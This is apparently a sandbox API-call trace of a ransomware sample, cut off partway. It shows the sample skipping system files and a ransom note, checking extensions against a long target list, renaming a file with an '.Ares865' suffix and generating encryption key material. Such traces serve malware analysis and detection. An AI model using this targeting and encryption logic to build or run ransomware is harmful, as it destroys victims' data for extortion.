[0084.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.817] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.818] CloseHandle (hObject=0x15c) returned 1 [0084.818] CloseHandle (hObject=0x118) returned 1 [0084.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.818] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="aoldtz.exe") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="..") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="windows") returned -1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="bootmgr") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="temp") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="pagefile.sys") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="boot") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="ids.txt") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="ntuser.dat") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="perflogs") returned 1 [0084.818] lstrcmpiW (lpString1="usertile19.bmp", lpString2="MSBuild") returned 1 [0084.818] lstrlenW (lpString="usertile19.bmp") returned 14 [0084.818] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 82 [0084.818] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile19.bmp" | out: lpString1="usertile19.bmp") returned="usertile19.bmp" [0084.819] lstrlenW (lpString="usertile19.bmp") returned 14 [0084.819] lstrlenW (lpString="Ares865") returned 7 [0084.819] lstrcmpiW (lpString1="e19.bmp", lpString2="Ares865") returned 1 [0084.819] lstrlenW (lpString=".dll") returned 4 [0084.819] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".dll") returned 1 [0084.819] lstrlenW (lpString=".lnk") returned 4 [0084.819] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".lnk") returned 1 [0084.819] lstrlenW (lpString=".ini") returned 4 [0084.819] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".ini") returned 1 [0084.819] lstrlenW (lpString=".sys") returned 4 [0084.819] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".sys") returned 1 [0084.819] lstrlenW (lpString="usertile19.bmp") returned 14 [0084.819] lstrlenW (lpString="bak") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.819] lstrlenW (lpString="ba_") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.819] lstrlenW (lpString="dbb") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.819] lstrlenW (lpString="vmdk") returned 4 [0084.819] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.819] lstrlenW (lpString="rar") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.819] lstrlenW (lpString="zip") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.819] lstrlenW (lpString="tgz") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.819] lstrlenW (lpString="vbox") returned 4 [0084.819] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.819] lstrlenW (lpString="vdi") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.819] lstrlenW (lpString="vhd") returned 3 [0084.819] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.819] lstrlenW (lpString="vhdx") returned 4 [0084.819] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.819] lstrlenW (lpString="avhd") returned 4 [0084.819] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.819] lstrlenW (lpString="db") returned 2 [0084.819] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.820] lstrlenW (lpString="db2") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.820] lstrlenW (lpString="db3") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.820] lstrlenW (lpString="dbf") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.820] lstrlenW (lpString="mdf") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.820] lstrlenW (lpString="mdb") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.820] lstrlenW (lpString="sql") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.820] lstrlenW (lpString="sqlite") returned 6 [0084.820] lstrcmpiW (lpString1="19.bmp", lpString2="sqlite") returned -1 [0084.820] lstrlenW (lpString="sqlite3") returned 7 [0084.820] lstrcmpiW (lpString1="e19.bmp", lpString2="sqlite3") returned -1 [0084.820] lstrlenW (lpString="sqlitedb") returned 8 [0084.820] lstrcmpiW (lpString1="le19.bmp", lpString2="sqlitedb") returned -1 [0084.820] lstrlenW (lpString="xml") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.820] lstrlenW (lpString="$er") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.820] lstrlenW (lpString="4dd") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.820] lstrlenW (lpString="4dl") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.820] lstrlenW (lpString="^^^") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.820] lstrlenW (lpString="abs") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.820] lstrlenW (lpString="abx") returned 3 [0084.820] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.820] lstrlenW (lpString="accdb") returned 5 [0084.820] lstrcmpiW (lpString1="9.bmp", lpString2="accdb") returned -1 [0084.820] lstrlenW (lpString="accdc") returned 5 [0084.820] lstrcmpiW (lpString1="9.bmp", lpString2="accdc") returned -1 [0084.820] lstrlenW (lpString="accde") returned 5 [0084.821] lstrcmpiW (lpString1="9.bmp", lpString2="accde") returned -1 [0084.821] lstrlenW (lpString="accdr") returned 5 [0084.821] lstrcmpiW (lpString1="9.bmp", lpString2="accdr") returned -1 [0084.821] lstrlenW (lpString="accdt") returned 5 [0084.821] lstrcmpiW (lpString1="9.bmp", lpString2="accdt") returned -1 [0084.821] lstrlenW (lpString="accdw") returned 5 [0084.821] lstrcmpiW (lpString1="9.bmp", lpString2="accdw") returned -1 [0084.821] lstrlenW (lpString="accft") returned 5 [0084.821] lstrcmpiW (lpString1="9.bmp", lpString2="accft") returned -1 [0084.821] lstrlenW (lpString="adb") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.821] lstrlenW (lpString="adb") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.821] lstrlenW (lpString="ade") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.821] lstrlenW (lpString="adf") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.821] lstrlenW (lpString="adn") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.821] lstrlenW (lpString="adp") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.821] lstrlenW (lpString="alf") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.821] lstrlenW (lpString="ask") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.821] lstrlenW (lpString="btr") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.821] lstrlenW (lpString="cat") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.821] lstrlenW (lpString="cdb") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.821] lstrlenW (lpString="ckp") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.821] lstrlenW (lpString="cma") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.821] lstrlenW (lpString="cpd") returned 3 [0084.821] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.821] lstrlenW (lpString="dacpac") returned 6 [0084.822] lstrcmpiW (lpString1="19.bmp", lpString2="dacpac") returned -1 [0084.822] lstrlenW (lpString="dad") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.822] lstrlenW (lpString="dadiagrams") returned 10 [0084.822] lstrcmpiW (lpString1="tile19.bmp", lpString2="dadiagrams") returned 1 [0084.822] lstrlenW (lpString="daschema") returned 8 [0084.822] lstrcmpiW (lpString1="le19.bmp", lpString2="daschema") returned 1 [0084.822] lstrlenW (lpString="db-journal") returned 10 [0084.822] lstrcmpiW (lpString1="tile19.bmp", lpString2="db-journal") returned 1 [0084.822] lstrlenW (lpString="db-shm") returned 6 [0084.822] lstrcmpiW (lpString1="19.bmp", lpString2="db-shm") returned -1 [0084.822] lstrlenW (lpString="db-wal") returned 6 [0084.822] lstrcmpiW (lpString1="19.bmp", lpString2="db-wal") returned -1 [0084.822] lstrlenW (lpString="dbc") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.822] lstrlenW (lpString="dbs") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.822] lstrlenW (lpString="dbt") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.822] lstrlenW (lpString="dbv") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.822] lstrlenW (lpString="dbx") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.822] lstrlenW (lpString="dcb") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.822] lstrlenW (lpString="dct") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.822] lstrlenW (lpString="dcx") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.822] lstrlenW (lpString="ddl") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.822] lstrlenW (lpString="dlis") returned 4 [0084.822] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.822] lstrlenW (lpString="dp1") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.822] lstrlenW (lpString="dqy") returned 3 [0084.822] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.823] lstrlenW (lpString="dsk") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.823] lstrlenW (lpString="dsn") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.823] lstrlenW (lpString="dtsx") returned 4 [0084.823] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.823] lstrlenW (lpString="dxl") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.823] lstrlenW (lpString="eco") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.823] lstrlenW (lpString="ecx") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.823] lstrlenW (lpString="edb") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.823] lstrlenW (lpString="epim") returned 4 [0084.823] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.823] lstrlenW (lpString="fcd") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.823] lstrlenW (lpString="fdb") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.823] lstrlenW (lpString="fic") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.823] lstrlenW (lpString="flexolibrary") returned 12 [0084.823] lstrcmpiW (lpString1="ertile19.bmp", lpString2="flexolibrary") returned -1 [0084.823] lstrlenW (lpString="fm5") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.823] lstrlenW (lpString="fmp") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.823] lstrlenW (lpString="fmp12") returned 5 [0084.823] lstrcmpiW (lpString1="9.bmp", lpString2="fmp12") returned -1 [0084.823] lstrlenW (lpString="fmpsl") returned 5 [0084.823] lstrcmpiW (lpString1="9.bmp", lpString2="fmpsl") returned -1 [0084.823] lstrlenW (lpString="fol") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.823] lstrlenW (lpString="fp3") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.823] lstrlenW (lpString="fp4") returned 3 [0084.823] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.824] lstrlenW (lpString="fp5") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.824] lstrlenW (lpString="fp7") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.824] lstrlenW (lpString="fpt") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.824] lstrlenW (lpString="frm") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.824] lstrlenW (lpString="gdb") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.824] lstrlenW (lpString="gdb") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.824] lstrlenW (lpString="grdb") returned 4 [0084.824] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.824] lstrlenW (lpString="gwi") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.824] lstrlenW (lpString="hdb") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.824] lstrlenW (lpString="his") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.824] lstrlenW (lpString="ib") returned 2 [0084.824] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.824] lstrlenW (lpString="idb") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.824] lstrlenW (lpString="ihx") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.824] lstrlenW (lpString="itdb") returned 4 [0084.824] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.824] lstrlenW (lpString="itw") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.824] lstrlenW (lpString="jet") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.824] lstrlenW (lpString="jtx") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.824] lstrlenW (lpString="kdb") returned 3 [0084.824] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.824] lstrlenW (lpString="kexi") returned 4 [0084.825] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.825] lstrlenW (lpString="kexic") returned 5 [0084.825] lstrcmpiW (lpString1="9.bmp", lpString2="kexic") returned -1 [0084.825] lstrlenW (lpString="kexis") returned 5 [0084.825] lstrcmpiW (lpString1="9.bmp", lpString2="kexis") returned -1 [0084.825] lstrlenW (lpString="lgc") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.825] lstrlenW (lpString="lwx") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.825] lstrlenW (lpString="maf") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.825] lstrlenW (lpString="maq") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.825] lstrlenW (lpString="mar") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.825] lstrlenW (lpString="marshal") returned 7 [0084.825] lstrcmpiW (lpString1="e19.bmp", lpString2="marshal") returned -1 [0084.825] lstrlenW (lpString="mas") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.825] lstrlenW (lpString="mav") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.825] lstrlenW (lpString="maw") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.825] lstrlenW (lpString="mdbhtml") returned 7 [0084.825] lstrcmpiW (lpString1="e19.bmp", lpString2="mdbhtml") returned -1 [0084.825] lstrlenW (lpString="mdn") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.825] lstrlenW (lpString="mdt") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.825] lstrlenW (lpString="mfd") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.825] lstrlenW (lpString="mpd") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.825] lstrlenW (lpString="mrg") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.825] lstrlenW (lpString="mud") returned 3 [0084.825] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.825] lstrlenW (lpString="mwb") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.826] lstrlenW (lpString="myd") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.826] lstrlenW (lpString="ndf") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.826] lstrlenW (lpString="nnt") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.826] lstrlenW (lpString="nrmlib") returned 6 [0084.826] lstrcmpiW (lpString1="19.bmp", lpString2="nrmlib") returned -1 [0084.826] lstrlenW (lpString="ns2") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.826] lstrlenW (lpString="ns3") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.826] lstrlenW (lpString="ns4") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.826] lstrlenW (lpString="nsf") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.826] lstrlenW (lpString="nv") returned 2 [0084.826] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.826] lstrlenW (lpString="nv2") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.826] lstrlenW (lpString="nwdb") returned 4 [0084.826] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.826] lstrlenW (lpString="nyf") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.826] lstrlenW (lpString="odb") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.826] lstrlenW (lpString="odb") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.826] lstrlenW (lpString="oqy") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.826] lstrlenW (lpString="ora") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.826] lstrlenW (lpString="orx") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.826] lstrlenW (lpString="owc") returned 3 [0084.826] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.827] lstrlenW (lpString="p96") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.827] lstrlenW (lpString="p97") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.827] lstrlenW (lpString="pan") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.827] lstrlenW (lpString="pdb") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.827] lstrlenW (lpString="pdm") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.827] lstrlenW (lpString="pnz") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.827] lstrlenW (lpString="qry") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.827] lstrlenW (lpString="qvd") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.827] lstrlenW (lpString="rbf") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.827] lstrlenW (lpString="rctd") returned 4 [0084.827] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.827] lstrlenW (lpString="rod") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.827] lstrlenW (lpString="rodx") returned 4 [0084.827] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.827] lstrlenW (lpString="rpd") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.827] lstrlenW (lpString="rsd") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.827] lstrlenW (lpString="sas7bdat") returned 8 [0084.827] lstrcmpiW (lpString1="le19.bmp", lpString2="sas7bdat") returned -1 [0084.827] lstrlenW (lpString="sbf") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.827] lstrlenW (lpString="scx") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.827] lstrlenW (lpString="sdb") returned 3 [0084.827] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.827] lstrlenW (lpString="sdc") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.828] lstrlenW (lpString="sdf") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.828] lstrlenW (lpString="sis") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.828] lstrlenW (lpString="spq") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.828] lstrlenW (lpString="te") returned 2 [0084.828] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.828] lstrlenW (lpString="teacher") returned 7 [0084.828] lstrcmpiW (lpString1="e19.bmp", lpString2="teacher") returned -1 [0084.828] lstrlenW (lpString="tmd") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.828] lstrlenW (lpString="tps") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.828] lstrlenW (lpString="trc") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.828] lstrlenW (lpString="trc") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.828] lstrlenW (lpString="trm") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.828] lstrlenW (lpString="udb") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.828] lstrlenW (lpString="udl") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.828] lstrlenW (lpString="usr") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.828] lstrlenW (lpString="v12") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.828] lstrlenW (lpString="vis") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.828] lstrlenW (lpString="vpd") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.828] lstrlenW (lpString="vvv") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.828] lstrlenW (lpString="wdb") returned 3 [0084.828] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.828] lstrlenW (lpString="wmdb") returned 4 [0084.829] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.829] lstrlenW (lpString="wrk") returned 3 [0084.829] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.829] lstrlenW (lpString="xdb") returned 3 [0084.829] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.829] lstrlenW (lpString="xld") returned 3 [0084.829] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.829] lstrlenW (lpString="xmlff") returned 5 [0084.829] lstrcmpiW (lpString1="9.bmp", lpString2="xmlff") returned -1 [0084.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.Ares865") returned 90 [0084.829] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.ares865"), dwFlags=0x1) returned 1 [0084.830] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.830] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.830] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.831] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.831] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.831] CreateFileMappingW (hFile=0x118, 